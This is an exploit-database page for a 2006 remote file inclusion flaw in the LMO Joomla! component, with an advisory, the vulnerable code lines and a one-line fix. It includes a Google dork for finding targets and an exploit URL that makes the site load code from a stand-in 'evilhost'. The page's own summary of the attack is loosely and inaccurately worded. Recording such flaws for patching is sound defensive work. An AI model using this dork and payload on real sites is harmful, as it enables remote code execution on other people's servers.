header-logo
Suggest Exploit
vendor:
LMO - Joomla! Component
by:
vitux
7,5
CVSS
HIGH
Input Validation
20
CWE
Product Name: LMO - Joomla! Component
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

LMO – Joomla! Component Variable $mosConfig_absolute_path not sanitized

The LMO - Joomla! Component is vulnerable to an input validation vulnerability due to the lack of sanitization of the $mosConfig_absolute_path variable. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to the victim. The malicious URL contains the $mosConfig_absolute_path variable set to a malicious host. When the victim visits the malicious URL, the malicious host will be executed.

Mitigation:

Add the following code before the vulnerable code: defined('_VALID_MOS') or die('Direct access to this location is not allowed.')
Source

Exploit-DB raw data:

Application : LMO - Joomla! Component

URL : http://forge.joomla.org/sf/projects/lmo

Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on
in components/com_lmo/lmo.php on line 11-12

$lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";
 
Exploit:
~~~~~~~~

dork: "com_lmo"

http://www.vuln.com/components/com_lmo/lmo.php?mosConfig_absolute_path=http://evilhost

Fix
~~~~

Add before code:
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

vitux
 
#vitux.manis@gmail.com

# milw0rm.com [2006-07-30]

Navigation

Suggest Exploit

Services By CQR